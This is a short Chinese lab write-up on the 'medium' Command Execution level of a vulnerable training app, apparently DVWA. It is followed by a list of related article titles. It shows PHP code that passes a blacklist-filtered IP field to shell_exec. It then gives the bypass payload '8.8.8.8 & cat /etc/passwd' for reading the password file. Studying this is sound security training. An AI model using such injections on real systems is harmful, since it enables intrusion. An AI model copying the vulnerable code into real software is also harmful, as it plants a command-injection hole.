Command Execution Source--medium
来源:互联网 发布:ipadmini淘宝试用在哪 编辑:程序博客网 时间:2024/06/08 16:26
<?phpif( isset( $_POST[ 'submit'] ) ) { $target = $_REQUEST[ 'ip' ]; // Remove any of the charactars in the array (blacklist). $substitutions = array( '&&' => '', ';' => '', ); $target = str_replace( array_keys( $substitutions ), $substitutions, $target ); // Determine OS and execute the ping command. if (stristr(php_uname('s'), 'Windows NT')) { $cmd = shell_exec( 'ping ' . $target ); echo '<pre>'.$cmd.'</pre>'; } else { $cmd = shell_exec( 'ping -c 3 ' . $target ); echo '<pre>'.$cmd.'</pre>'; }}?>
这里采用了replace函数 :
$target = str_replace( array_keys( $substitutions ), $substitutions, $target );
显而易见 如果没有这个函数 我们输入 8.8.8.8 && cat /etc/passwd可以成功通过
但是这里变成了 8.8.8.8 cat /etc/passwd
结合到代码中变成了 ping -c 3 8.8.8.8 cat /etc/passwd
显然这一句话不是个成功的命令 返。错误
问题就是要绕过&&和;
我构造这样一句话 成功绕过 8.8.8.8 & cat /etc/passwd
嘻嘻
0 0
- Command Execution Source--medium
- Gitorious Remote Command Execution
- Anfibia Remote Command Execution
- Exim / Dovecot Command Execution
- Command Execution --low
- DVWA之Command Execution
- Exim sender_address Remote Command Execution
- Linux Command - source
- DVWA - Command Injection (low, medium, high)
- Netrw Vim Script Multiple Command Execution Vulnerabilities
- TWiki SEARCH Variable Remote Command Execution Vulnerability
- xterm DECRQSS Remote Command Execution Vulnerability
- gitWeb v1.5.2 Remote Command Execution
- Command execution with a MySQL UDF
- Apache Struts2 File Overwrite / Command Execution
- op5 Appliance Multiple Remote Command Execution Vulnerabilities
- RECEME - Remote Command Execution through eMail Exchange
- ZABBIX 'node_process_command()' Remote Command Execution Vulnerability
- ACdream 1414(计算几何)
- INS-20802
- 专注于现在
- ROA的两个特性
- 统计大写字母个数——来自华为OJ平台测试基础篇
- Command Execution Source--medium
- cocos2d-x 3.2 2048——第六篇(最终章)
- 什么是资源
- PHP外观模式
- Apache性能监控
- 统一接口
- ios图片操作类:WZRecyclePhotoStackView的使用
- 面向资源架构的好处
- poj 3087 Shuffle'm Up (模拟搜索)